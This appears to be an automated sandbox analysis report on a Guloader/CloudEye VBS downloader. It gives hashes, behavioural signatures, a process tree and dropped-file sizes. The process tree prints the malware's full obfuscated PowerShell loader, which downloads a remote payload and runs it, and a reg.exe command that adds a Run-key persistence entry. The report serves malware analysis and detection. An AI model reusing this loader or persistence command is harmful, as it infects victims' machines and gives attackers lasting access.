Analysis
-
max time kernel
158s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
29/03/2024, 02:37
General
-
Target
b9dcf5b6299259d5409b222121e3f866ef697ba83d488a83846196efd6d143f3.vbs
-
Size
237KB
-
MD5
09e1b1aa6f21931c821f0dbb8ffb630a
-
SHA1
300abf78bd3f51937752d82e610108a6025d9baa
-
SHA256
b9dcf5b6299259d5409b222121e3f866ef697ba83d488a83846196efd6d143f3
-
SHA512
c51bf4a8085af153ec06921b59ce5f9c735916186a992abbb29539e9e5fd597f9bcfd9c79fecdec1e947a5fd5d227a62f203d3b596e1f4d1579b1d73246e283e
-
SSDEEP
6144:Z5hQMLtOBxJrv5lttSP4KuK8jWwoipSRUiGT9rS2fTicm7fIQzmFAjX:bkVB5+jX
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 21 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b9dcf5b6299259d5409b222121e3f866ef697ba83d488a83846196efd6d143f3.vbs"2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Analopos Fenter Accidental Afsnringens Allgovite #>;<#Aaler Stut Slgtleddet Agitators #>;New-Item -Path 'Celledonorens:\Filingen' -Name 'Nyskabelsens' -ItemType 'file';<#Beboelsesejendom reputationer Sonnetish Christianittens Bellbirds #>;Function Giftigheder ([String]$Uensartet140){$Pyretotherapymmunopathology = 2;For($Pyretotherapy=1; $Pyretotherapy -lt $Uensartet140.Length-1; $Pyretotherapy+=$Pyretotherapymmunopathology){ $Anneks = $Uensartet140.Substring($Pyretotherapy, $Turcykels); $Reoccurs=$Reoccurs+$Anneks; }$Reoccurs;}$Turcykels = (cmd /c 'echo 1 && exit');if (Test-Path 'Celledonorens:\Filingen\Nyskabelsens') {$Turcykels--};$Uncubically=Giftigheder 'fiDeRxH ';$Talmagi=Giftigheder 'GT r,a,n sSfMe.rDrHiGnPg. ';$Chymifying = Giftigheder ' \RsGyNs wRo wU6.4B\TWSi.n dFoEwIs.P o wTeSrRSPhDe,ljl \Av,1V.E0S\FpAo.w,eNr s,h e.lSlS. e x,eS ';function Bunks ($Careire){&($Uncubically) ($Careire);}$Tachists=Giftigheder ' hDtLt p : /C/NjUaNw,aSpBhMaBr.m,aDcAeNu t,iTcBaHl.sA.Hc.o mB/.PBr e c.o nEtHr,o.lSlOeCd .EdRw.p ';$Udsknke=$Tachists.split([char]62);$Tachists=$Udsknke[0];Bunks (Giftigheder 'P$Og lKo b a l :ODPeAlSa.rCbIe.j dMe rEs =S$Te n vR:LwBi,n d i r. ') ;Bunks (Giftigheder 'E$Ag l o bSaIl :AB.e,sHiFn d.eHnsdCe s,=S$SDPeDlSa.r bTeRjOdKe,r,s +.$,CEh y.mUiffBy iPnFg ') ;Bunks (Giftigheder 'N$ gTl oIb,a,l :,L aSnDdFf aCs t e s =, R( ( gTwEm i DwRiAnO3A2L_KpHrYoEcEeBs s. B-UF ,PMrSo,cDe.sLs ICdB=.$ {FPSI D },)..,C oSmOmBa nHdSL.i nSe.)B -BsLpMl iDtK .[.c h aor ].3 4G ');Bunks (Giftigheder ' $fg,lPo,b aUlU: JkaMrTh,e a,dB ,=D .$ L,a.n dOfPaHsMt eIsN[A$OL a,n,dRf a sBtfe sr..c oFuFn tS-R2T]U ');Bunks (Giftigheder 'S$sgtlHoFbHa lK:BSAl,emn d.rOi a n =P(bT eAs.t -,P aKtHh. .$ B,eFsFiBn,dHe n dNezsR)N .-VA nMd, E( [ I nCtoPKtOrT],:,:Ss i,z.eG A- eGq. E8S), ') ;if ($Slendrian) {& $Besindendes $Jarhead;} else {;$Bookwright=Giftigheder ' $,gCl oUb.a l,:HK lPaTg e,s.kTr i vaeIlEs eGnR B=P S tTa r,tC- B,iJtTs T.r aLn,s f egr S-,S oHu,rFc.e K$FT aPcNhTi s.tEsU .-.DTe sftSi nWa.tNiAoSnE ,$ DpeRlcaPr,bDe jSdVe.rPs ';Bunks (Giftigheder 'S$Sg,lNoTbTaSlT: D e,lPa r.b edjSd e,rSsK=E$Te n vS: a p p d,aStHa ') ;Bunks (Giftigheder '.I m p oRr,tW-EMEo d u lLeK EB i.t s T rKaSnSs fUeGrN ') ;$Delarbejders=$Delarbejders+'\Stableren.Lys' ;Bunks (Giftigheder 'S$ g lAo.b a lV:,H e r imt a gSe.sE=S( TPe sOt.- PGaAtahB a$ODIeSlEabr.b e.jSd.eer,sM), ') ;while (-not $Heritages) {Bunks (Giftigheder 'FI f S(S$.K.l aIg e s kLrIi v e,lUs eIn,. JSo,b SSt.attFeV S- eAq F$ T aOl,mCaHg i )m {,S tAa r t - S,lBeBe pS ,1G}MeSl,s eD{GS.teaBrStU-CS lheKe p R1.; B,u.n kFsT $SB oPoDkYw r iJgAhGtA} ');Bunks (Giftigheder ' $.g lUo.bBaCl :,HUe rMiEt a.gFeTsC=.( TFessAt -oPma.t.h ,$sDMe lPaCr bje,jcd,eAr.sA)f ') ;$Tachists=$Udsknke[$Centralforeningers++%$Udsknke.count];}Bunks (Giftigheder ',$ g l oSb.aCl :TLEaMr,gFe kPoWbMoUlMdM =S TGSeGtA-SC oan t eMn t, $ DGeLl aTrIb.eUj.dNe r,s, ');Bunks (Giftigheder 'S$.g l o.bTaPlt: A.f p iNlsnUiOnFgSeHr n,ec ,=T [TSSyTsPt,e m . CIoDnIv.esr tC].:,: FSr,o m B aUsFeB6R4 S,t,r iBnSg ( $HL.a r g,eMk oUbSo.lGd.), ');Bunks (Giftigheder ' $,gGl oUbTaIlA:DBlo.f f ofs. =C .[ SNySsOtMesmF. T e xRtS. E nUc o d,iEn gH]O:M:.APS,C IPI,.kGSePt,SDt.r iBnTg ( $ ASfsp.i l nDi,n g eBr nKeA)L ');Bunks (Giftigheder ',$Sg lUonb.a.l,: BFe sRk fCt i.g.eTl sOeAsDtOe r a.pTeSu t sC=T$.BAoIf f o,s .Cs,u,bFsMt,rHi nDgW(C3 2S1F8 1I0 ,.2 4F6V7k2S)T ');Bunks $Beskftigelsesterapeuts;};;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"4⤵
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Analopos Fenter Accidental Afsnringens Allgovite #>;<#Aaler Stut Slgtleddet Agitators #>;New-Item -Path 'Celledonorens:\Filingen' -Name 'Nyskabelsens' -ItemType 'file';<#Beboelsesejendom reputationer Sonnetish Christianittens Bellbirds #>;Function Giftigheder ([String]$Uensartet140){$Pyretotherapymmunopathology = 2;For($Pyretotherapy=1; $Pyretotherapy -lt $Uensartet140.Length-1; $Pyretotherapy+=$Pyretotherapymmunopathology){ $Anneks = $Uensartet140.Substring($Pyretotherapy, $Turcykels); $Reoccurs=$Reoccurs+$Anneks; }$Reoccurs;}$Turcykels = (cmd /c 'echo 1 && exit');if (Test-Path 'Celledonorens:\Filingen\Nyskabelsens') {$Turcykels--};$Uncubically=Giftigheder 'fiDeRxH ';$Talmagi=Giftigheder 'GT r,a,n sSfMe.rDrHiGnPg. ';$Chymifying = Giftigheder ' \RsGyNs wRo wU6.4B\TWSi.n dFoEwIs.P o wTeSrRSPhDe,ljl \Av,1V.E0S\FpAo.w,eNr s,h e.lSlS. e x,eS ';function Bunks ($Careire){&($Uncubically) ($Careire);}$Tachists=Giftigheder ' hDtLt p : /C/NjUaNw,aSpBhMaBr.m,aDcAeNu t,iTcBaHl.sA.Hc.o mB/.PBr e c.o nEtHr,o.lSlOeCd .EdRw.p ';$Udsknke=$Tachists.split([char]62);$Tachists=$Udsknke[0];Bunks (Giftigheder 'P$Og lKo b a l :ODPeAlSa.rCbIe.j dMe rEs =S$Te n vR:LwBi,n d i r. ') ;Bunks (Giftigheder 'E$Ag l o bSaIl :AB.e,sHiFn d.eHnsdCe s,=S$SDPeDlSa.r bTeRjOdKe,r,s +.$,CEh y.mUiffBy iPnFg ') ;Bunks (Giftigheder 'N$ gTl oIb,a,l :,L aSnDdFf aCs t e s =, R( ( gTwEm i DwRiAnO3A2L_KpHrYoEcEeBs s. B-UF ,PMrSo,cDe.sLs ICdB=.$ {FPSI D },)..,C oSmOmBa nHdSL.i nSe.)B -BsLpMl iDtK .[.c h aor ].3 4G ');Bunks (Giftigheder ' $fg,lPo,b aUlU: JkaMrTh,e a,dB ,=D .$ L,a.n dOfPaHsMt eIsN[A$OL a,n,dRf a sBtfe sr..c oFuFn tS-R2T]U ');Bunks (Giftigheder 'S$sgtlHoFbHa lK:BSAl,emn d.rOi a n =P(bT eAs.t -,P aKtHh. .$ B,eFsFiBn,dHe n dNezsR)N .-VA nMd, E( [ I nCtoPKtOrT],:,:Ss i,z.eG A- eGq. E8S), ') ;if ($Slendrian) {& $Besindendes $Jarhead;} else {;$Bookwright=Giftigheder ' $,gCl oUb.a l,:HK lPaTg e,s.kTr i vaeIlEs eGnR B=P S tTa r,tC- B,iJtTs T.r aLn,s f egr S-,S oHu,rFc.e K$FT aPcNhTi s.tEsU .-.DTe sftSi nWa.tNiAoSnE ,$ DpeRlcaPr,bDe jSdVe.rPs ';Bunks (Giftigheder 'S$Sg,lNoTbTaSlT: D e,lPa r.b edjSd e,rSsK=E$Te n vS: a p p d,aStHa ') ;Bunks (Giftigheder '.I m p oRr,tW-EMEo d u lLeK EB i.t s T rKaSnSs fUeGrN ') ;$Delarbejders=$Delarbejders+'\Stableren.Lys' ;Bunks (Giftigheder 'S$ g lAo.b a lV:,H e r imt a gSe.sE=S( TPe sOt.- PGaAtahB a$ODIeSlEabr.b e.jSd.eer,sM), ') ;while (-not $Heritages) {Bunks (Giftigheder 'FI f S(S$.K.l aIg e s kLrIi v e,lUs eIn,. JSo,b SSt.attFeV S- eAq F$ T aOl,mCaHg i )m {,S tAa r t - S,lBeBe pS ,1G}MeSl,s eD{GS.teaBrStU-CS lheKe p R1.; B,u.n kFsT $SB oPoDkYw r iJgAhGtA} ');Bunks (Giftigheder ' $.g lUo.bBaCl :,HUe rMiEt a.gFeTsC=.( TFessAt -oPma.t.h ,$sDMe lPaCr bje,jcd,eAr.sA)f ') ;$Tachists=$Udsknke[$Centralforeningers++%$Udsknke.count];}Bunks (Giftigheder ',$ g l oSb.aCl :TLEaMr,gFe kPoWbMoUlMdM =S TGSeGtA-SC oan t eMn t, $ DGeLl aTrIb.eUj.dNe r,s, ');Bunks (Giftigheder 'S$.g l o.bTaPlt: A.f p iNlsnUiOnFgSeHr n,ec ,=T [TSSyTsPt,e m . CIoDnIv.esr tC].:,: FSr,o m B aUsFeB6R4 S,t,r iBnSg ( $HL.a r g,eMk oUbSo.lGd.), ');Bunks (Giftigheder ' $,gGl oUbTaIlA:DBlo.f f ofs. =C .[ SNySsOtMesmF. T e xRtS. E nUc o d,iEn gH]O:M:.APS,C IPI,.kGSePt,SDt.r iBnTg ( $ ASfsp.i l nDi,n g eBr nKeA)L ');Bunks (Giftigheder ',$Sg lUonb.a.l,: BFe sRk fCt i.g.eTl sOeAsDtOe r a.pTeSu t sC=T$.BAoIf f o,s .Cs,u,bFsMt,rHi nDgW(C3 2S1F8 1I0 ,.2 4F6V7k2S)T ');Bunks $Beskftigelsesterapeuts;};;"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"5⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Couscoussen" /t REG_EXPAND_SZ /d "%Automatiseres% -w 1 $Pinnisect=(Get-ItemProperty -Path 'HKCU:\Beatille\').Outchase;%Automatiseres% ($Pinnisect)"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Couscoussen" /t REG_EXPAND_SZ /d "%Automatiseres% -w 1 $Pinnisect=(Get-ItemProperty -Path 'HKCU:\Beatille\').Outchase;%Automatiseres% ($Pinnisect)"7⤵
- Adds Run key to start application
- Modifies registry key
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 13846⤵
- Program crash
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1632 -ip 16321⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
4KB
-
Filesize
45.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.1MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
45.9MB
-
Filesize
1.9MB
-
Filesize
45.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
1.9MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
600KB
-
Filesize
64KB
-
Filesize
45.9MB
-
Filesize
1.1MB
-
Filesize
64KB
-
Filesize
45.9MB
-
Filesize
45.9MB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
45.9MB
-
Filesize
80KB
-
Filesize
136KB
-
Filesize
6.5MB
-
Filesize
5.6MB
-
Filesize
136KB
-
Filesize
104KB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
64KB
-
Filesize
216KB
-
Filesize
7.7MB